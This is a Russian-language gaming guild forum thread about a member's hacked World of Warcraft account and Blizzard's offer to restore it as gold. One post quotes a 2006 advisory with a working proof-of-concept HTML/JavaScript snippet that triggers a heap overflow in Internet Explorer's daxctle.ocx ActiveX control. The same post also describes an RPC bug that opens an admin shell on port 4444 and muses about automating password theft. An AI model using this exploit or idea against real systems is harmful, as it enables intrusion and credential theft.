Взломан

[shadowing]

2Meggido
Ну поехали...
1. Нет не специалист.
2.http://www.securitylab.ru/vulnerability/in...XP&set_filter=Y
3.Грамотно- это не значит что кто-то денно и нощно только тем и занимался что пытался твой комп ломануть, банально : "Вписываем в страницу сайта
<img src="ссылочка на 255 символов"> далее винда выдает ошибку RPC и через некоторое время гарантирует отход в мир иной, в этот момент, у тебя на 4444 порту открывается шелл с админскими правами, далее дело техники..." Ошбка старая и в данный момент не актуальна, это так для примера... А если процесс автоматизировать...Ой е... Это знаешь скока логинов и пассов (не только от ВоВа) упереть можно ??
Ответ на твой вопрос насчет того что нас всех должны взломать.... MyDoom, I love you, дальше перечислять ?
На машине нет троев и ошибок в системе безопасности только в одном случае...
Если все харды прошли через format.

И на последок...
30 августа, 2006

Программа: Microsoft Internet Explorer 6.x
Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной проверки входных данных в ActiveX компоненте 'daxctle.ocx'. Удаленный пользователь может с помощью дескриптора DirectAnimation.PathControl вызвать переполнение динамической памяти и аварийно завершить работу браузера или выполнить произвольный код на целевой системе. Пример:


<!--// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx
--!>
<html> <head> <title>test</title> </head> <body> <script> var target = new ActiveXObject("DirectAnimation.PathControl"); target.Spline(0xffffffff, 1); </script> </body></html>

URL производителя: www.microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

[Wintorez]

2для тех, кто нашел у себя в реестре упоминание про svchqs.exe или svch0st.exe:
если они прописаны в ветке реестра типа
HKEY_USERS\S-тут много цифр\Software\Microsoft\Search Assistant\ACMru\5603,
то ничего страшного у вас нет. Здесь записаны названия файлов, которые вы вводили при запуске поиска

[Meggido]

Вот такое получил от близзов...
Не знаю-радовацца или рыдать
Скорее таки рыдать-цифра какая-то не сексуальненькая...
Хотя как посмотреть конечно...

Присоединённое изображение

[Meggido]

продолжение...

Присоединённое изображение

[Meggido]

окончание...

Присоединённое изображение

[Silvertail]

Зашибись - тебя толкают к покупке голда

[johnvb]

я думаю наберем мы тебе 2к голды ...
деньги то фигня, а вот шмот ты такой будешь полгода собирать.

[Luke Skyrunner]

Я думаю если вся гильда скинется (народу? человек 70 точно есть...) то легко наберем... Осталось только чтоб все поддержали...

[Meggido]

2johnvb:
Спасибо)
Я и не сомневаюсь,что будь такая необходимость-гильдия не останется в стороне.Но тут дело не в голде...Как правильно заметил Сильв-меня натурально толкают на совершение наказуемого деяния-то бишь покупку голда. Ибо собрать такую сумму с голой жопой нереально-нужно быть одетым.Чтобы быть одетым-мне надо собрать туеву хучу денег.Парадокс,похожий на скрытую издевку.

[Etena]

странный какой-то ответ, с голой задницей действительно собирать голд - нелепо..

в 2 известных мне случаях (абсолютно таких же) полностью восстановили эквип, лежащее в банке - пропало.

[Poul]

2Meggido:
В банке есть около 700г. Куда скинуть?

[Noisy]

2Meggido:
это сделано для того, чтобы не злоупотребляли этим. т.е. представь, что сейчас все сделают ДЕ своих шмоток скинут их на левого чара возьмут реал за голда. потом пишут все письмо близам и все что было восстанавливают. и так до опупения. неплохой заработок, да?
вот они и хотят вернуть эквивалент в деньгах этих шмоток.
они ведь не знают, что ты такой хороший не делал ничего плохого. изначально они рассматривают что все плохие. так везде где есть многопользовательская поддержка. так устроен мир.

[sugrob]

мегидо!
имхо
НУЖНО ЗАПОСТИТЬ ЕТО НА ОФФ ЕВРО ФОРУМЕ с матом и тп
что дескать блин изза ваших улучшений такое происхоит с чарами
как я понял у тебя чара хакнули в момент сервер дауна
и скрины с ответом близов выложи пусть комьюнити поропщет - буржуи они такие

[EcoDark]

Мда. Ответ действительно странный, какая нафик экономика сервера? Они обязаны все вернуть, ниче ты им за это платить не должен. Сперли когда серверы биыли в дауне, так? А кто имеет доступ к серверам, когда они в дауне? Близзы, есессно. Значит, это наверное сделали они, хотя зачем?

[Thais]

Гы - Близзы бизнесменят не по детски: продают нам коробки, берут бабосы ежемесячно, а потом еще небось и голд игровой за реальные деньги продают.... Ибо как мне кажется, у Близзов как раз самые что ни на есть глубокие закрома с ВОВ голдом